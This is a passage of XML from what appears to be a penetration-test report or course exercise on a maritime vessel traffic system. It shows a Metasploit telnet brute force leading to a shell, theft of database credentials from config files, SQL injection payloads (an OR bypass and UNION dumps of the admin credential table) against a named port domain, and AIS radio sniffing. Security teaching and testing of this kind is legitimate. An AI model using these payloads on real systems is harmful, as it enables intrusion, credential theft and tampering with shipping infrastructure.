              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; use auxiliary/scanner/telnet/telnet_login</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; set RHOSTS 172.16.10.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; set USER_FILE /usr/share/wordlists/users.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; set PASS_FILE /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; run</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172.16.10.20:23 - Login Successful: admin : admin123</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Command shell session 1 opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Post-Exploitation: Data Extraction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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">VTS-CONTROL-01$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</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VTS-CONTROL-01$ ls /opt/vts/config/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">database.conf   api_keys.json   vessel_routes.db</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VTS-CONTROL-01$ cat /opt/vts/config/database.conf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DB_HOST=172.16.20.5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DB_USER=vts_admin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DB_PASS=VTS@2024!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DB_NAME=maritime_ops</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IMPACT: Full admin access. DB credentials, vessel routes,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    and API keys extracted. Attacker can manipulate vessel traffic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 Flaw #11 — SQL Injection in Vessel Registration (Burp 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Affected Endpoint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/api/vessel/search — port.neom-maritime.sa</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Attack Family</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Injection — OWASP A03:2021 (Ch.7)</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Tool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Burp Suite Interceptor + Repeater</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CVSS Score</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9.8 — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Identify Injection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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Intercepted in Burp Suite:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/vessel/search HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: port.neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">{"vessel_id": "IMO1234567"}</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Test single quote — SQL error returned:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">{"vessel_id": "'"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Response: Error: You have an error in your SQL syntax near</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          ''IMO' at line 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[!] SQL error confirms injectable parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Authentication Bypass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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Classic OR bypass (Chapter 7 SQL Injection example):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">{"vessel_id": "' OR '1'='1'--"}</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Response: {"status":"success",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           "vessels":[{847 vessel records returned}]}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[!] Full vessel database returned — admin access granted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — UNION-Based Data Extraction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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Extract DB version and current user:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">{"vessel_id": "' UNION SELECT version(),user(),3,4--"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Response: {"vessel_name":"5.7.32-MySQL",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           "imo":"vts_admin@localhost"}</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Dump admin credentials table:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">{"vessel_id": "' UNION SELECT username,password,3,4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  FROM admin_credentials--"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Response: {"vessel_name":"superadmin",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           "imo":"$2y$10$hashed_password_exposed"}</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IMPACT: Complete DB access. 847 vessel records, cargo</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    manifests, and admin hashes extracted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 Flaw #2 — AIS Data Interception (Wireshark + SDR)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Target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AIS VHF Channel 87B — 161.975 MHz</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Attack Family</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Network — Packet Sniffing (Ch.7)</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Tools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RTL-SDR Receiver + Wireshark</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CVSS Score</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9.1 — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Capture AIS Traffic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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Wireshark capture filter for AIS UDP stream:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Filter: udp port 10110</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Raw NMEA sentences captured (NO ENCRYPTION):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">!AIVDM,1,1,,B,15M67N0P00J9KwlH4eJT7GwR0&lt;0j,0*7A</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">!AIVDM,1,1,,A,177KQJ5000G?tO`K&gt;RA1wUbN0TKH,0*5C</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">!AIVDM,2,1,3,B,55?MbV02Ah;KF0l4eB08Dhh4l05&lt;Tr,0*4D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Decode AIS Payload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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Decoded AIS Message Type 1 — Position Report:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MMSI         : 477553000</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Vessel Name  : NEOM CARGO EXPRESS 01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Latitude     : 28.5 N</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
